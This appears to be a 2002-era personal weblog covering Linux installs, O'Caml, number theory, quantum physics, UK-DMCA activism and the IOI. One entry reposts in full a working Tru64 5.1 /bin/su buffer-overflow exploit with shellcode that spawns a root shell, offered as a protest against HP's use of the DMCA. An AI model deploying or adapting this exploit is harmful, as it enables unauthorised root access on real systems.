    Installed RH7.3 on a spare drive last night (long story involving odd hardware and a friend needing it) and I'm shocked how easy the install was. Gosh darn it! I can still remember when installing Linux was no mean feat and I'm so young that my first Linux distrib (Slackware) had a 2.0.0 kernel.

    In those days an install was a maze of quirks and hardware problems littered with dire warnings about how X would fry your monitor if you got the frequencies wrong. Heck, you were damm lucky if today's kernel managed to exec /bin/sh. In those days spirits were brave, the stakes were high, men were real men, women were real women, and small furry creatures from Alpha Centauri were real small furry creatures from Alpha Centauri.

    The damm RH install was graphical (even has a graphical GRUB menu) and picked up all my weird hardware first time and even got X going with DRI. The only thing it didn't detect is that I have 2 monitors. No wonder there are so many Linux lusers on /. if the install is this easy!

    Proof systems

    There is a proof system for O'Caml called Coq. I keep running off to theme parks and things so I haven't had a chance to read it yet.

    Some languages are "safe" in the sense that you cannot dereference NULL pointers etc. Typed languages ensure that arguments to functions cannot be of the wrong type etc. Proven languages can ensure (incomplete list):

    • The program won't segfault...
    • ... or buffer overflow...
    • ... loop forever ...
    • ... or even call API's badly

    In fact you could even give everyone root permissions, but require that programs prove that they aren't doing anything wrong.

    This type of thing is obviously very usefully generally but, as has been pointed out many times, we could even get rid of operating systems because no program would do anything nasty (and we could prove this). In a single-level store design having all the programs in a single address space could be a big performance boost.

    Mersenne Primes and Perfect Numbers

    Mersenne (named after a french monk) primes are of the form 2n-1 where n is an integer, greater then 0. There is a distributed.net like effort to find them called GIMPS (search Google).

    A perfect number is a number where the sum of its divisors (excluding itself, but including 1) equals that number. For example 6 is perfect because (1 + 2 + 3) = 6. Thus the sum of all the divisors is twice the number.

    Now, I read a while back in a book that (2n-1)(2n-1) was proven to be a perfect number, but the book didn't have the proof. Thankfully, I ran across the proof today. That proof leaves out a number of steps thou, so here's a better one:

    • p = 2n - 1, and is prime
    • m = (2n-1)p
    • sigma(x) is the sum of all the positive divisors of x
    • sigma(a*b) = sigma(a)*sigma(b) where gcd (a, b) = 1 (think about it)
    • sigma(m) = sigma (2n-1p)
    • = sigma(2n-1) * sigma (p)
    • Now, p was defined to be prime, thus its only divisors are 1 and itself, thus the sum of those divisors must be p + 1
    • Also, by thinking of the prime factorisation of 2a, the divisors of 2a must include all lesser powers of 2 (where the power is greater then, or equal to, 0). By still considering the prime factorisation there can be no other divisors. Thus sigma (2n-1) must be 2n-1. It might help to think of the numbers in binary form to see this.
    • thus sigma(m) = (2n-1)(p+1)
    • expanding this gives 2n(2n-1) which is equal to 2m.
    • Thus the sum of all the divisors of m is 2m. Thus m is perfect.

    One from The Book

    O'Caml

    After a brief holiday, The Memory Hole is ticking again.

    People keep talking about it and it's high time that I looked into it. O'Caml is an ML based language and has all the standard ML language stuff (curried functions etc). It uses inferred typing, which is very useful, despite the few drawbacks (more on that later).

    It also has polymorphic typing:

    # let f = function (a, b) -> a;;
    val f : 'a * 'b -> 'a = <fun>

    That function takes a 2-tuple of any type and returns the first element and polymorphically works within the type-system.

    There is a translation of a French O'Reilly O'Caml book online, but I find it's a little heavy for a introductionary text. I find that this book it nicer to start with. Maybe move on the O'Reilly book afterwards.

    This code snippet, which implements red-black binary tree insertion, should demonstrate the power of O'Caml even if you don't understand it. (This assumes you've seen what a mess a red-black insert looks like in C/C++. If not, see this, and I have reasonable reason to suspect there's an error in there since it was done partly from CLR).

    let balance = function
      Black, Node (Red, Node (Red, a, x, b), y, c), z, d ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, Node (Red, a, x, Node (Red, b, y, c)), z, d ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, a, x, Node (Red, Node (Red, b, y, c), z, d) ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | Black, a, x, Node (Red, b, y, Node (Red, c, z, d)) ->
        Node (Red, Node (Black, a, x, b), y, Node (Black, c, z, d))
      | a, b, c, d ->
        Node (a, b, c, d)
        
    let insert x s =
      let rec ins = function
        Leaf -> Node (Red, Leaf, x, Leaf)
      | Node (color, a, y, b) as s ->
          if x < y then balance (color, ins a, y, b)
          else if x > y then balance (color, a, y, ins b)
          else s
      in
        match ins s with    (* guaranteed to be non-empty *)
          Node (_, a, y, b) -> Node (Black, a, y, b)
        | Leaf -> raise (Invalid_argument "insert");;
    

    However, there are a couple of silly bits on O'Caml. Firstly, the bitwise (not, logical) AND function is called land. Secondly, the namespace for record fields is flat within a module, so you can't have 2 record/struct types with the same named field in a single module. I'm pretty sure that there isn't a deep reason for that (the shallow reason has to do with type inference).

    Dee M Cee A!

    From one of Coderman's friends....

    (Sung to the tune of Y.M.C.A by the Village People)
    
    Net geeks
      There's no need to feel guilt
    I said, net geeks
      For the software you built
    I said, net geeks
      'Cause you're not in the wrong
    There's no need to feel unhappy!
    
    Net geeks
      You can burn a CD
    I said, net geeks
      With your fave mp3s
    You can play them
      In your home or your car
    Many ways to take them real far!
    
    It's fun to violate
      the D M C A !
    It's fun to violate
      the D M C A-AY !
    You have everything
      You need to enjoy
    Your music with your toys!
    
    It's fun to violate
      the D M C A !
    It's fun to violate
      the D M C A-AY !
    
    You can archive your tunes
      You can share over cable
    You can annoy the
      Record Labels!
    

    Photos from the IOI are u...

    Photos from the IOI are up. There aren't many, but hopefully Richard got lots more on his (really nice) digital camera.

    Lightbulbs and Quantum Physics

    Discovered a MAP_GROWSDOWN flag in asm/mman.h, unfortunately it doesn't seem to do what one would hope.

    Stand have a longish entry on the UK-DMCA. They suggest that the chances of parliament nullifing it are pretty much nil (which, I guess, is depressingly true), and suggest that people write to the UK Patent Office and the Secretary of State for Trade and Industry and try to get more opt-out clauses into the UK law. There has been far too little press coverage about this so far. I've contacted New Scientist, so hopefully they will have something.

    There's also a chance that NS will have a short section on the IOI. I only hope they don't include that god awful photo of the team taken at Cambridge. (and, no, I'm not giving the link!)

    One of the defining characteristics of quantum physics, over and above the classical, it that it is non-deterministic. Many people have had problems with this, most famously Einstein ("God does not play dice!"). A deterministic universe is very comforting to some people (myself half included) and certainly sits nicely with the logical worlds of maths and computers.

    Since many classical processes are statistically modelled (for example, temperature) because it's not useful deal at the level of individual, vibrating molecules some have suggested that the only reason that quantum physics looks non-deterministic is because we are only seeing the cumulative effects of an underlying deterministic system. These ideas are usually called hidden variable theories.

    I'm going to run over an argument that TBL gave to me and that's pretty much convinced me to give up on hidden variable theories.

    Imagine a light bulb which, at time t, is either on or off and its state is totally random. That's non-deterministic. Not imagine that a pseudo-random number generator (or a Rule 30 CA if you wish, Mr Wolfram) is hidden in the light bulb and actually governs the bulb's state. Given enough time we might be able to reverse the PRNG and that would be a deterministic universe.

    Now, our quantum universe might be really non-deterministic or it might have a deterministic process underlying it. However, Bell's Theorem shows that, if there is an underlying deterministic process, then it cannot be localised. So you could not take a section of the universe and have it be deterministic, only (possibly) the whole universe. However, we are in the universe, and so cannot measure every roll of the dice. So in the end you might as well give up on it being deterministic, because it would be a useless determinism anyway.

    Well, seems that JDarcy s...

    Well, seems that JDarcy sent in a comment, but changed the subject line so the comment processor rejected it. I thought the subject lines were odd enough looking that people would realise they denote the entry to be commented (or the comment to be commented in the case of threading).

    Anyway. The processor (silently) drops malformed mails so we will never know what insightful words JDarcy had the world (unless he reposts).

    Having said that, noone has yet managed to get a comment up. People have even mailed me about the comment system rather than post a comment!

    Comments System

    Well, turns out the that builders cut the power on Friday (about 3:30 BST) and metis lasted about 45 minutes on the UPS before dying. Since it's softswitched it doesn't power up when the power comes back on (which sucks) and I should get the UPS software working better. Oh, and by the way, I hate builders.

    Is an emailed based comments system a blogging first? Well, it's here anyway. Still a little rough about the edges but nothing a little testing (and bug reporting) can't fix (hint!).

    Should I put the mails in <pre> tags? At the moment I turn blank lines into <br><br> but that's all.

    Ecstasy not dangerous?

    Reports suggest that E mightn't be the instantly fatal rat-poison we thought it was. Well, we knew that anyway and it's nice to see a report that isn't funded by the US govt to repeat that "Drugs are baaaad".

    But don't forget the E is still the most adulterated street drug on the planet. It's been cut with everything under the sun, some of it pretty nasty.

    Hardware Hell

    It has a really bad few days for hardware. Firstly, metis (the server which hosts IV) dropped off the face of the net sometime Friday. As I write this it's still down, but I'll be going in to see what died tomorrow. Hopefully it just hit its mean time between failure for the memory and a bad bit flip killed it. Then again, another rat may have pissed in the power supply and shorted it out (I kid you not - that's what killed it last time)

    Talking of PSUs I think I need a new one. Twice today my SCSI array failed which causes a reasonably slow, but always fatal, system failure as more and more processes get stuck in the escalator. I'm pretty sure that I'm browning out the power supply having in my case, as I do:

    • 2 Processors
    • 4 9GB SCSI drives
    • A 20GB IDE drive
    • G400 Video card
    • 2 SCSI cards
    • DVD drive
    • Modem
    • 3 ISA cards

    Time for a bigger PSU I think

    Math's Gem

    Ok, so I'm sure it's a really well known result in number theory, but it's the first time I've seen it:

    For any integer n, to find the number of factors of the integer find the exponents of the primes in its prime factorisation (call that set a) and eval (reduce #'* (mapcar (lambda (x) (+ x 1)) a)))

    For example: where n=12 the prime factorisation is 2^2, 3^1 so a=(2, 1) and it has (2 + 1)(1 + 1) = 6 factors (namely 1,2,3,4,6,12)

    Comments

    It's a pretty standard feature of most blogs that users can add comments. Well, IV has never had that because it would require PHP (or something similar) and I just don't trust apache/PHP to be secure. However, after a remark from Ian I thought that I might be able to have an email based comment system. Watch this space.

    Static analysis of code

    I mentioned on Friday that statically analysing untrusted machine code to prove that it's safe to run might be a good idea (go read the post if you haven't already). Well, having thought about it (and looked at RTL) I'm thinking that working with C code might not be so bad after all. I've found a library (CTool) that looks as if it will make the whole parsing a lot easier. Again, watch this space.

    BRiX

    BRiX (which I linked to yesterday) popped up on /. while I was in Korea and I've only just got round to having a look at it.

    Basically, it's a safe-language OS (where the OS doesn't need to protect processes from each other because the language they are all written in prevents them being bad). It's an old-trick, but I never seen a serious implementation and it would be cool if BRiX reached even a first-beta level (satanic red on black colour scheme not withstanding).

    However, I'm undecided on the merits of the safe-language approach. Firstly it mandates that every program be written in the language/byte code (where the changes with each safe-language OS). In BRiX's case the language is called Crush and looks like a typed dialect of Lisp. Learning a new language and rewriting everything in it is a nasty barrier to entry, even if it does hold a certain appeal in terms of cleaning out old code.

    With this in mind I'm wondering if a decompiler could statically analyse compiled C code and determine if it's safe. I think, in theory if system calls were treated as non-deterministic, then it should be possible. The practice, on the other hand, might be somewhat painful.

    Just a quick FAQ for anybody asking Why work with machine code, why not the C code?. Mainly because I think I would end up compiling the C code to a reasonably low level anyway. By working from the C code I might get some loop structure etc for free, but since it's perfectly legal to build loops out of gotos I would have to do control-flow analysis anyway, so why have the pain of processing C?

    It might be that working with RTL (gcc's intermediate code rep) would be better. There are flags for dumping RTL trees (see your gcc manpage) but I have no experience with RTL. And, of course, if you are happy with the machine code you can run it, but if you are only happy with the RTL you still have to trust a compiler to generate good binaries.

    802.11b networks

    Assorted (but unsorted) links:

    Coderman is talking (a little) about P2P radio networks:

    Wide spread internetworked wifi hot spots + decentralized peer networks + strong crypto == sweet ass high speed unrestricted digital networks. The possible applications of such networks are extremely exciting (IMHO).

    The Freenet team were discussing this idea last year, not really anything to do with Freenet, but as a general point. I don't think this idea is really going to take off until there is a certain density of clueful people with 802.11b in a given area. However, this may already have happened in several places.

    Personally, I have far too little experience with 802.11b. The only time I've ever found an AP was in a hotel in Guildford and even then the AP was configured not to do anything. So I could pretty much SNMP walk it, ping it and little else .

    However, I agree totally with Coderman that it could be insanely cool.

    Much of the work on P2P wireless routing has dealt with getting packets to gateways over a number of hops. Basically a 2 tier network where packets are always going to, or coming from, a gateway. This is a much simpler problem than P2P routing over a network where the nodes will be moving.

    Now, one of the cool things that wireless networks do well is broadcast. I mean - it really is a broadcast and the bandwidth needed is independent of the number of nodes that are reached. Most routing protocols are designed for a wired world where broadcasting to n nodes requires n packets. I'm sure there are some cool routing protocols for this which don't require nodes to know their GPS position, thou I'll have to think some more about it.

    (and, of course, true broadcast makes DC rings worth considering for some problems)

    Crap. I so forgot to uplo...

    Crap. I so forgot to upload the MP letter yesterday. Fixed.

    This is quite an interresting example of bullshit in it's purest form. It's pretty rare to find anything this pure. I would pull some quotes from it, but that would dilute this, a masterpeice of its art-form [via Wes]

    Today's required reading is the beginning few chapters of the MetaMath book [via Raph]

    Results

    Right, I'm back from the IOI [warning: utter crap website]. I did pretty crap (about half way down I think). Partly because of a very depressing number of tiny, but critical, typos but mostly because I don't think I'm cut out for this timed algorithmic stuff. Give me a couple of days to think about something and I might come up with a decent algorithm. In 30 minutes it doesn't happen. I guess I could have done a lot better if I had just chosen poor, but simple algorithms - but that's not really in the spirit of the competition.

    I'll have photos scanned at some point, both from my camera and Richard's (the UK team leader) very impressive digital camera. That will be in a week or so.

    If I learnt one thing from my time in Korea it's this: Don't eat the Kimchi. Don't even ask about it.

    The IOI was held at Khung Hee University in Yong-In, Korea. It's a very nice campus, even if some of the buildings are bad European architecture copies. You can dig up the schedule of events and stuff from the website linked to above.

    It was superbly organised (with a budget of $2.2 million) to the point that our convoy of 24+ coaches (which took us everywhere) had a full police escort which closed off the roads ahead of us to let us pass.

    The guards armed with guns that looked like they could stop a tank where a little worrying. As was the day when we came back to find about 100 riot police sitting on their shields and waving at us. The small number of protesters, who had been protesting about KHU's treatment of the hospital workers, had gone.

    I've scanned the protester's flyer: side one, side two (help make your daily karma quota by reading it).

    The translations of some of the Korean into English (the official IOI language) provided some good laughs. It seems that Korean doesn't have a concept the the definite article, which is why they often miss out `the' and 'a'. (do an impression and you'll see that you do the same.)

    The next IOI (which I'll be too old for) is being held in the US. Unfortunately their major (only?) sponsor, USENIX, has dropped out. If your helpful company, with their huge amounts of cash-flow in these great economic times , would be interested in funding the US IOI I'm sure they would love to hear from you.

    The day before I went to Korea was A-level results day. Got the results at 10:30, out with friends until 1am the next morning and was up to go to the airport at 5am. One manic day .

    TypeSubjectGrade
    A-LevelBiologyA
    A-LevelMathsA
    A-LevelFurther MathsA
    A-LevelPhysicsA
    AEABiologyDistinction
    AEAPhysicsMerit

    A-Levels are the standard exam taken at 18. AEAs are super-A-levels which you don't study for (at least I didn't).

    Those results easily get me into Imperial College.

    EUCD (UK-DMCA)

    I've yet to check what organisations (like EuroRights and Stand) have been doing on this front but I had a neat letter from my MP in the post when I got home. You can see the scan here:

    I can assure you that I am sceptical of anything coming from the EU and, in your letter, you give good reasons why we should consider annulling this one - if we can!

    I will, therefore, take the matter up once Parliament resumes and will write you you again then. In the meantime, [thank] you for alerting me to this important issue

    The Conservatives are the second party in the UK (and Labour, the 1st party has a huge majority) so I'm not optimistic about getting this thing annulled. But at least we may be able to kick up a storm and raise the public perception.

    Crypto-GRAM

    It's nice to know that even people like Bruce Schneier have total brain farts sometimes too.

    The idea is that different users on the system have limitations on their abilities, and are walled off from each other. This is impossible to achieve using only software

    Question of the day

    Will a random walk in discreet n dimensional space tend to cover the whole space, or only a fraction of it? If so, what fraction?

    (P.S. I don't actually know the answer)

    Back home. Need sleep....

    Back home. Need sleep.

    New addition to the Lette...

    New addition to the Letters page; a letter about the UKDMCA to my MP.

    Hmm, even 512 kilobaud Ogg Vorbis cannot encode some music quite right - I can still hear the artifacts and don't even think about mentioning MP3. So I've taken to using lossless compression - flac is good, open source and has a XMMS plugin. I'm getting about 25% compression.

    UK-DMCA

    Coderman is working on a new project - PeerFrogs. Looks like it forms the basis for his CodeCon 2 submission.

    From Danny O'Brien (the NTK guy):

    I'm pretty sure it's a statutory instrument with negative resolution -
    which is to say, it becomes law the moment it's announced, butParliament has forty days to pass a motion annulling it. AFAIK, that's
    how most EU Directives are implemented.
    

    Oh crap

    That means MP's have to get off their backsides and actually do something active. We screwed.

    Userland page fault handling

    One of the weaknesses of user land threading is that you have to alloc a fixed area as thread stack space. This imposes an extra, non-trivial, cost on thread creation as the stack size for all threads is determined by the biggest (unless you pass a hint at creation time which is dangerous).

    The solution to this is to do the same as the kernel does; handle page faults as the threads fall off the bottom of the stack space and map in pages to catch them. That way you have to set a fixed max size for stacks - but you don't have to map in all those pages. You use up address space, not memory

    Of course, address space isn't exactly huge in a 32-bit machine. On most Linux boxes I think dlls are mapped in at 0x80000000 (it's 0x00100000 here, but that's because I run funny kernel patches). That leaves half the address space free for mapping since the main stack grows down from the 3GiB mark.

    So, assuming that we have 2GiB of address space for stacks we can reserve 128KiB for stacks and fit in 16384 threads. When you consider that most threads will take about at least 8KiB of actual stack, and that 8KiB*16384 = 134MB of stack, that limit doesn't seem to bad. (It's still not great thou, and there is some deep&dangerous hackery that can get around it, email me if you want details).

    The actual page fault handling turns out not to be too hard. First mmap a couple of pages from /dev/zero for the signal stack (since we are trapping when we run out of stack we need the SIGSEGV handler to run on a different stack), fill out a stack_t struct and setup the SIGSEGV to use it. In the handler, process the siginfo_t and find the stack which faulted and use mmap to add another stack:

    void sig_segv (int sig, siginfo_t *siginfo, void *d)
    {
    	// Walk the threads and find the one that faulted from the fault
    	// address in siginfo->si_addr
    
    	// Use mmap with MAP_FIXED to map in another page at the right place
    }
    
    void
    setup_fault_handler ()
    {
    	stack_t sigst;
    	struct sigaction sigact;
    	char *sigstack;
    	int devzerofd;
    
    	devzerofd = open ("/dev/zero", O_RDWR);
    
    	sigstack = mmap (NULL, 8192, PROT_READ | PROT_WRITE, MAP_PRIVATE, devzerofd, 0);
    
    	sigst.ss_sp = sigstack;
    	sigst.ss_flags = 0;
    	sigst.ss_size = 8192;
    
    	sigact.sa_sigaction = sig_segv;
    	// set the sigact mask
    	sigact.sa_flags = SA_ONSTACK | SA_SIGINFO;
    
    	sigaltstack (&sigst, NULL);
    	sigaction (SIGSEGV, &sigact, NULL);
    }
    

    This is pretty cool (need...

    This is pretty cool (needs javascript). Go there and play before reading the rest of this.

    There are very few numbers which can be produced from the system of subtracting the digits of a number. 10-19 give an answer of 9, 20-29 give an answer of 18 and so on for multiples of 9. This reduces the possibility set drastically.

    The next thing to realise is that the possibilities are spaced out evenly and all the possibilities have the same symbol. Quite neat.

    BitTorrent

    First release of bttrackd (my BitTorrent tracker) is here

    UK-DMCA

    On the UK-DMCA, quoting myself from a debian-uk post:

    The consultation lasts until the end of October and I think they are
    looking to pass the bill by the end of year. It's only August and we
    have to be careful not to move too fast. We are fighting against the
    treacle of people's attention spans and it takes a massive amount of
    energy to keep anything moving against that for  months. More energy
    than we have. We should wait until a few (3-4, I guess) weeks before
    the vote and blitz the press (as was done for the RIP extension, but
    then we didn't have much choice about the timing).
    
    Though that doesn't mean that we can't start preparing for it before
    then.

    MetaFun

    After giving up ages ago on getting any of the funky ConTeXt stuff working, I took the plunge and installed TeTeX, ConTeXt and Metafun manually. Seems to be working - I managed to compile this at least (just a few rip offs of examples from the metafun manual). I need to run mpost manually though.

    UK Political Corruption

    The UK implimentation of the EU copyright directive (read: UK-DMCA) has been published. The fight continues. Here's NTK's summary:

    when this becomes law, the "contract" you have with a copyright holder will almost completely trump your right as a purchaser of copyrighted material. And your contract is hereby defined by the copy protection technologies the distributors stick on your media. So if that CD doesn't play on your PC - well, that's what you "agreed" to, and there's nothing you can do. If you try and circumvent any the copy protection (or, in the case of computer programs, explain how to do so to anyone else), you can be punished as much as if you were pirating the data yourself (Article 6). Heck, if you even try to remove any of the tracking spyware, you'll be in equal amounts of trouble (Article 7).

    Is anyone organising the defence? Time for another letter to my MP I guess

    All the security problems in 2.4.18 are listed in the 2.4.19-sec notes. however, if you're in the US the DMCA means it cannot be published there [FAQ]. For non-US citizens you can get it here. Of course, all this moral high ground is about to collaspe under the weight of the UK-DMCA.

    The Labour Party (who currently hold power in the UK for a second term, after the biggest second term election victory ever) have dire fiscal problems. They are estimated to be £6-8 million in debt and have had to ask for a donation of £100,000 from the unions to cover short term costs.

    The unions obliged and are making no secret of the fact that they expect something in return in terms of policy decisions.

    Am I the only one whos jaw dropped at the way this corruption (and that's what it is) is accepted? If a business did the same there would be political hell to pay. It's time for public funding of political parties.

    (and maybe then the MP3 party can have a good stab :))

    setuidgid and chroot

    setuidgid is utility program included with daemontools. It occurs that it's impossible to use this with chroot:

    chroot(2) requires root on most systems, therefore it must be run before setuidgid. This means that setuidgid is run with root permissions (as it always must be) and must be in the chroot jail in order for chroot(1) to run it. Thus if the final process in the chain (usually the one that setuidgid execs) is exploited it can change the setuidgid binary in the jail, and so runcode as root the next time that daemon is started.

    I'm working on a BitTorre...

    I'm working on a BitTorrent tracker in C, as bram asked for one in the todo. It's half-done I guess and since the point of it is speed it has some pretty funky data structures which are going to take a while to debug. In fact the function to verify them is looking pretty hairy.

    Unless you have your head deep in the sand you'll know that Edsger Dijkstra has died of cancer. Joey has the best writeup so far.

    Cryptome has long served as the website for infomation that some people wouldn't like published. It now has a companion site, The Memory Hole. Salute these people - they do the good work.

    CodeCon 2003 Call For Pap...

    Memes Redux

    I head off home tomorrow. I would have gone today but the British rail system being what it is (which is generally ok, but crap on Sundays) the only train was at 23:30 and gets in at 9 tomorrow morning.

    Keith commented on my ramble about memes on Wednesday. I'll expand a little on that today.

    I think a lot of my ramble can be represented as the question "Is elegance a fundamental environmental factor for memes?". The fitness function for a genetic algorithm has 2 parameters - the replicator and the environment. The environment can be split into fundamental factors and other replicators.

    As an example, in gene evolution rain is a fundamental factor of the environment (at least it is here). If the gene causes its host to explode whenever it rains that seriously hurts its fitness. (not to mention creating a real mess.) In the same example, predators are other replicators effecting the environment of a gene. If the gene causes the host to light up in the ultraviolet and its predators see ultraviolet then that, too, will hurt its fitness.

    So is elegance a fundamental factor or a meme? I can think of evidence for and against - but in the end I guess the argument is a little pointless. If anyone disagrees (with either assertion) - feel free to reply

    Memes

    I'm going to quote out of an email reply I just wrote tonight. It's a little rambling, but never mind. I think it's kind of interesting and hopefully will help me get a grip of my thoughts faster next time I'm thinking around these areas.

    Tune of the moment: Scooter - Ramp (The Logical Song) (Radio Mix)

    I don't think memes/genes are conscious, but I do think that, as replicators, they can exert a powerful influence to aid their replications. You can often pick out features in memeplexes (a set of interacting memes which can be functionally treated as a whole) designed as an `immune system' etc. For example the Christian ideas of "I am the one true god, worship no other" and of faith seem (to me) to fit into that category.

    You can certainly pick out other categories of memes in memeplexes too:

    • Insertion vectors:
      • explaining the meaning of life
      • giving hope after death
    • Gene interactions, keeping the host alive:
      • Rules for hygiene and living
    • Replication:
      • (Evangelical branches are strong in these)
      • Unbelievers go to hell come Judgement Day
      • Missionary stories
    • Benefit for the creator (sometimes):
      • Scientology

    Memes/genes also provide an ethical axiom which allows the construction of morals which I consider to be reasonable. Of course I'm working backwards here (from the high level towards to axioms) and I'm sure that working the other way could lead to morals that I couldn't accept.

    However, it does lead to some positions which many would find objectionable. For one I much more supportive of animal testing than most. I'm also quite supportive of the idea of genetically modifying a human germline with the proviso that we get better at it first.

    I don't think I can articulate the structure I want to at the moment. Maybe I'll come back to it later. (if you're reading this I guess I didn't).

    Later: Ok, I still don't think I can articulate it so I'm leaving that last paragraph in, but here goes:

    Since I'm making value judgements about moral systems I must have some built in morality (memes) which almost certainly come from my upbringing. My upbringing is mostly Christian, but not strongly so. My parents don't go to church etc so I have a pretty common Western set (don't kill people, be nice etc).

    However, I feel the need to justify those memes and I flat out reject the theistic aspects of Christianity. I also reject some of those upbringing moral memes. So either I have `scientific model' memes too or something is built in.

    Now, morals change all over the world and can generally be overridden/ignored in a Lord of the Flies type of way. But there is a certain sense of grace that I'm wondering might be built in. The grace I'm talking about is the beauty of great mathematical proofs or the elegance of superb design.

    I cannot see that this is generally communicated as a meme and it seems to have existed (in some individuals) in many different cultures and at many different times.

    So maybe my need to justify my moral set comes from an inbuilt human attribute rather than a meme. And an justification needs axioms, which is where memetic theory came in.

    HP uses the DMCA to try a...

    HP uses the DMCA to try and hide security problems in Tru64: /. and News.com. Here is it for all you people anyway:

    /*
     /bin/su tru64 5.1
     works with non-exec stack enabled
     
     stripey is the man
    
     developed at http://www.snosoft.com in the cerebrum labs
    
     phased
     phased at mail.ru
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    char shellcode[]=
    	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
    	"\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
    	"\x12\x14\x02\x42"      /* addq $16,16,$18              */
    	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
    	"\x12\x94\x09\x42"      /* addq $16,76,$18              */
    	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
    	"\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
    	"\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
    	"\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
    	"\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
    	"\x10\x04\xff\x47"      /* clr $16                      */
    	"\x11\x14\xe3\x43"      /* addq $31,24,$17              */
    	"\x20\x35\x20\x42"      /* subq $17,1,$0                */
    	"\xff\xff\xff\xff"      /* callsys ( disguised )        */
    	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
    	"\x31\x15\xd8\x43"      /* subq $30,192,$17             */
    	"\x12\x04\xff\x47"      /* clr $18                      */
    	"\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
    	"\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
    	"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
    	"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
    	"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
    	"\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
    	"\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
    	"\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
    	"\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
    	"\x13\x94\xe7\x43"      /* addq $31,60,$19              */
    	"\x20\x35\x60\x42"      /* subq $19,1,$0                */
    	"\xff\xff\xff\xff";     /* callsys ( disguised )        */
    
    /* shellcode by Taeho Oh */
    
    main(int argc, char *argv[]) {
    int i, j;
    char buffer[8239];
    char payload[15200];
    char nop[] = "\x1f\x04\xff\x47";
    
    bzero(&buffer, 8239);
    bzero(&payload, 15200);
    
    for (i=0;i&lt;8233;i++)
            buffer[i] = 0x41;
    
    /* 0x140010401 */
    
            buffer[i++] = 0x01;
            buffer[i++] = 0x04;
            buffer[i++] = 0x01;
            buffer[i++] = 0x40;
            buffer[i++] = 0x01;
    
    for (i=0;i&lt;15000;) {
    	for(j=0;j&lt;4;j++)  {
            	payload[i++] = nop[j];
    	}
    }
    
    for (i=i,j=0;j&lt;sizeof(shellcode);i++,j++)
    	payload[i] = shellcode[j];
    
    	printf("/bin/su by phased\n");
    	printf("payload %db\n", strlen(payload));
    	printf("buffer %db\n", strlen(buffer));
    
    	execl("/usr/bin/su", "su", buffer, payload, 0);
    
    }
    

    Semantic Web

    Zooko has gone away again and shutdown his mail server. However, I'm ready for him this time! . I'm getting quite good with qmail because of all all this.

    Buffer overflows in OpenSSL makes a mess of a number of programs. However, these came to light because of a number of code reviews so this is an example of open source working, security wise. It would be nice to know that the privsep code in OpenSSH stops these overflows from really doing damage - but I haven't heard anything to that effect. Boxes upgraded anyway.

    Also, big bugs in PHP 4.2.[01]. Fixed in 4.2.2. All upgrade.

    Programming with Schelog. Pretty cool - for best results mix with the SemWeb (see below)

    Today/tonights reading was semantic web stuff. The W3C and TimBL (not to be confused with the other TBL who I have mentioned here before) have been talking about this Semantic Web stuff for ages. This SciAm article (May, 2001) is a good introduction and TimBL talks lots about it towards the end of Weaving the Web. However, all them seem to have is a lot of talk. All the talk lays out a system of logic graphs with a simple type system. The type system is too simple but they hint about DAML+OIL and WebOnt WG as better ones, so why don't they switch?

    I can't help feeling that the actual content of the Semantic Web group could have been knocked out over a couple of weekends. What they should be doing is building a good Schema defining relations for many different groups and kniting them together because that's political work and the the clout of the W3C would help lots. Then then can actually start pushing it and say "Here's the schema for a [bookshop|weblog|generic company], markup your stuff and look what our cool tools can do!"

    It wouldn't be perfect, but face it, it's not going to be perfect anyway and it doesn't have to be. Worse is sometimes better; UNIX killed the Lisp machine.

    (and on a more technical note: they don't seem to have the concept of different relations holding at different times. And, talking of that, they don't even seem to have defined how to spec a time - that's how primitive it still is)

    It also occurs to me that one of the bumps on the road for the Semantic Web is that companies don't actually really want to help the customer. Remember how the hype said that web agents would be searching all the vendors web sites and finding the cheapest for a given item? (and this was going to be done by about 1995 or something) Well the SemWeb is a step on the way to that situation and that isn't good news for companies as it forces them into price wars on many goods. Thus I expect that they are going to resist exposing information like that and form confusopolies (that's a Dilbert word, and a really good one).

    Scheme

    Well, I did come up with a load of links over the weekend and wrote up an IV entry - then promptly forgot to upload it. Rats. That'll sit at home for another couple of weeks now

    However, here are some that I dug out today:

    You're going to have to Google for the rest of the links today

    God it's hot. Not going to be sleeping well tonight

    Been looking at Bigloo - a compiler for (mostly) R5RS Scheme which outputs C and Java bytecodes as its backends. One very nice feature is that it's designed to work with Java/C native code really well. However much we might wish it wasn't, the reality is that FFI interfaces in higher level languages (now there's a vague term (and a redundant acronym for that matter)) are really important.

    It even manages to compile non-deterministic code using call/cc (see the snippet below, mostly from On Lisp)

    In addition it has a nice (ILISP like) Emacs interface and what looks like a very nice native IDE, called BDK. I say looks like because I cannot get it to compile, but the screen shots are impressive

    LtU has a link to conference notes about Bigloo's TK based GUI toolkit, called BigLook

    (module nondet)
    
    (define *paths* '())
    (define failsym '@)
    
    (define (choose choices)
      (if (null? choices)
          (fail)
        (call-with-current-continuation
         (lambda (cc)
    	(set! *paths* (cons (lambda ()(cc (choose (cdr choices)))) *paths*))
    (car choices)))))
    
    (define fail 0)
    
    (call/cc
     (lambda (cc)
       (set! fail (lambda ()
    		 (if (null? *paths*)
    		     (cc failsym)
    		     (let ((p1 (car *paths*)))
    			(set! *paths* (cdr *paths*))
